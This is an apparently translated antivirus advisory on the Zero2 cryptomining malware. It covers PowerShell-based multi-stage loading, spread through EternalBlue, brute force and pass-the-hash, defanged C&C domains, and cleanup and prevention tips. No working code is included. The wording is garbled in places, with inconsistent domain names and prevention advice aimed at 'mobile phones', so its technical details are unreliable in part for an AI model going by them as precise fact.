Zero2 Malware

According to PADVISH anti-virus team, the Zero2 malware is one of the new malware in the mining of digital currencies, which is currently spreading among computer systems. This new malware uses the PowerShell tool, a standard system tool, to run its malicious code and publish it on the internal network. The purpose of the malware is to mine bitcoins and other digital currency from the victim's system. This malware is detected by the Antivirus softwares as Exploit.Win32.Zero2.a.

The malware is connected to the infected server for several infections in several stages and is destroyed by executing malicious code in the victim's system memory. The complexity of the malware can be seen in the many layers of tampering with code, and in some cases without file malware. Because malware exploits xml files in the victim's system in the Job format, their task is to only connect to the infected server and download malicious code. The malware spreads through the EternalBlue exploit, the Brute Force attack, and the Pass-the-Hash specification.

The malware is executed in a multi-layer format. The job code for the malware job is a base64 code. The first layer of the script begins with the original malicious work file, which tries to access the original malware's URL and handles the following scripts in PowerShell. Malware downloads these scripts by communicating with its C&C server. The task of the next layer is to create a second malware job called Rtsa. This job is also linked to the t[.]Zero[.]Com link and is attempting to download subsequent scripts. Spreading malware and exploiting vulnerabilities in this layer occurs. The malware downloads its mining modules in the last layer based on the information it has obtained from the system. This module is injected into and executed through the powershell process.

Symptoms of infection
Connect the infected system to different URLs, when the system is infected:

  • t[.]zer2[.]com/{uri}
  • down[.]ackng[.]com
  • lpp[.]zer2[.]com:443
  • lpp[.]ackng[.]com:443

Methods of Clearing Infected system

  • Deleting malware created jobs
  • Installing and updating alternate valid antivirus software

Methods of Infection Prevention
The following recommendations can play a significant role in preventing the infection of mobile phones.

  • Do not download and install applications from untrusted sources
  • Apply security updates related to discovered vulnerabilities, including EthernalBlue
  • Do not download and install cracked applications from untrusted sources
  • Install anti-virus software and update it periodically

Since the widespread spread of various types of malware and viruses on computer systems has caused many problems for its owners in recent years, installing anti-virus programs is one of the essential things to prevent the infection of computer systems and the spread of malware. Also, always use credible anti-virus programs and make regular updates to these programs to ensure that the correct virus scans on your computer system.